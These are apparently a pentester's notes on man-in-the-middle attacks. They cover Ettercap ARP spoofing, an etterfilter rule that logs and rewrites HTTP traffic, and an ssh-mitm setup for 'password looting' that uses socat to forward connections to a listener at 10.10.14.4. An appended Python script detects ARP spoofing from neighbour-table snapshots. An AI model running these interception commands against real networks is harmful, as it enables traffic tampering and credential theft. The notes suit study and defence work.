# Man In the Middle

## Ettercap

* [Ettercap](https://www.ettercap-project.org/)
* [Bettercap](https://www.bettercap.org/)
* ARP spoofing via ettercap and read traffic. Press `q` to quit and restore the pre-MITM ARP caches.

```sh
# $INTERFACE is the network interface to use (placeholder)
ettercap -T -i $INTERFACE -M arp
```

* Etterfilter can filter and restructure packets

```sh
man etterfilter
```

```sh
# Match HTTP requests (TCP port 80) that mention filename.html, log them and rewrite the name
if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
    log(DATA.data, "/tmp/ettercap.log");
    replace("filename.html", "otherfilename.html" );
    msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
}
```

* Escape double quotes inside the payload string
* Compile the filter source (here `filter.filter`, so the compiled output does not overwrite it) via

```sh
etterfilter filter.filter -o filter.ef
```

* Run the filter via

```sh
ettercap -T -i $INTERFACE -M arp -F filter.ef
```

## mitm-server

Set up a local man-in-the-middle server, which can be used, for example, for password looting if somebody logs in. [SSH-MITM](https://docs.ssh-mitm.at/#) provides this feature. Install the package via `pip install ssh-mitm`. Redirect the port to the MITM server and start it afterwards.

```sh
((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &)
ssh-mitm server --remote-host "$TARGET_IP"
```
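
The detection-side counterpart to the ARP spoofing in the Ettercap section, added here as an example (not part of the original notes): it compares two `ip neigh show` snapshots and flags an IP whose MAC changed and a MAC that answers for several IPs. The addresses, sample tables and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# IPv4 lines of `ip neigh show`, e.g.
#   10.0.0.1 dev eth0 lladdr 52:54:00:aa:bb:01 REACHABLE
# Entries without a link-layer address (FAILED/INCOMPLETE) do not match.
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+"
    r"lladdr\s+(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)

def parse_neigh(text):
    """Return {ip: mac} for every resolved neighbour entry."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table

def findings(baseline, current):
    """Compare a trusted table with a current one; return sorted (kind, detail)."""
    out = []
    # 1. An IP whose MAC differs from the trusted baseline (watch the gateway).
    for ip, mac in current.items():
        if ip in baseline and baseline[ip] != mac:
            out.append(("mac_changed", f"{ip}: {baseline[ip]} -> {mac}"))
    # 2. One MAC answering for several IPs in the same snapshot.
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            out.append(("shared_mac", f"{mac}: {', '.join(sorted(ips))}"))
    return sorted(out)

# Constructed sample data: 10.0.0.1 is the gateway, 10.0.0.66 the spoofing host.
BASELINE = """10.0.0.1 dev eth0 lladdr 52:54:00:aa:bb:01 REACHABLE
10.0.0.20 dev eth0 lladdr 52:54:00:aa:bb:20 STALE
10.0.0.66 dev eth0 lladdr 52:54:00:aa:bb:66 STALE"""
POISONED = """10.0.0.1 dev eth0 lladdr 52:54:00:aa:bb:66 REACHABLE
10.0.0.20 dev eth0 lladdr 52:54:00:aa:bb:20 STALE
10.0.0.66 dev eth0 lladdr 52:54:00:aa:bb:66 REACHABLE
10.0.0.99 dev eth0 FAILED"""

if __name__ == "__main__":
    for kind, detail in findings(parse_neigh(BASELINE), parse_neigh(POISONED)):
        print(f"[{kind}] {detail}")
```

A shared MAC can be legitimate (proxy ARP, hosts with several addresses), so treat `shared_mac` as a lead and a `mac_changed` hit on the gateway entry as the stronger signal.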